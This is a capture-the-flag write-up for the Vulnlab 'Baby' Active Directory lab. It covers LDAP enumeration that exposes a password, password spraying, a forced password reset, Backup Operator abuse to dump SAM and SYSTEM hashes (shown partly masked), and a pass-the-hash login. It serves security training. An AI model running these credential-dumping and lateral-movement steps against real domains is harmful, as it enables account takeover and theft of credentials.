🐈Baby

Easy machine

Enumeration

Nmap

Ldapsearch

Domain = baby.vl

ldapsearch -H ldap://$IP -x -b "DC=BABY,DC=VL"

I have now a lot of results that can be useful to analyse

About users (& a password inside the description of an user ⚠️):

dev (group)
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
it (group)
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell (password: **********)
Caroline.Robinson

SMB

Access denied in guest

We will try with our new creds: Teresa.Bell:**********

RPC

Try to enum domain users but I’m getting an access denied

Trying also with my new creds but not successful

Kerbrute

After trying a password spraying through all the users, I found the real creds:

Compromised user = Caroline.Robinson@baby.vl:**********

Crackmapexec

We need to change the password to connect to this user

We can use smbpasswd

smbpasswd.py -newpass 'Makito123!' 'baby.vl'/'Caroline.Robinson':'**********'@"$IP"

We have now: Caroline.Robinson':'Makito123!'

Domain Enumeration

Doing some domain enumeration with Bloodhound & PowerShell

We can confirm that the user Caroline.Robinson can backup files and so, we can gat the SAM & SYSTEM files to possibly crack or pass the Admin hash

Backup Operator Privilege Escalation < BorderGateBorderGate

https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secretwww.thehacker.recipes

Hashes

> secretsdump -sam SAM.save -system SYSTEM.save LOCAL

Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b5??????????????????????:8d992faed3??????????????????????:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

But we can do nothing with the Admin hash because it’s a local admin so we can’t use this account to connect to the DC

We need also this ntds.dit

Dumping Domain Controller Hashes Locally and RemotelyRed Teaming Experiments

After following the blog, I can login with the hash with Evil-WinRM and get the root flag

PWNED 🏆

FzF_StormZ just pwned Baby @ Vulnlab!

PreviousMachines NextData

Last updated 5 months ago